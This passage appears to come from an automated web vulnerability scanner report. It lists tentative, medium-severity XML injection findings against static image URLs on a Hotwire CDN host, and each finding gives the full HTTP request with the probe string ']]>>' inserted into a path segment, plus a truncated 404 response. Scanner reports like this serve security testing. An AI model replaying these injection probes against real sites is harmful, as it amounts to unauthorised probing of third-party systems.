Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:39 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.186. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/map-console/icons]]>>/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535998
Date: Mon, 03 Oct 2011 01:02:42 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.187. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/map-console/icons/airport-icon.gif]]>>?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:43 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.188. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/3.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.189. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/3.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535967
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.190. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/3.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535968
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.191. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.0.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/3.0.gif]]>>?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:06 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.192. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/3.5.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.193. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/3.5.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.194. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/3.5.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.195. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/3.5.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/3.5.gif]]>>?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.196. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/4.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535955
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.197. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/4.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535943
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.198. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/4.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.199. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/4.0.gif]]>>?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.200. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/overall/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.201. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/overall/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.202. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/overall/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
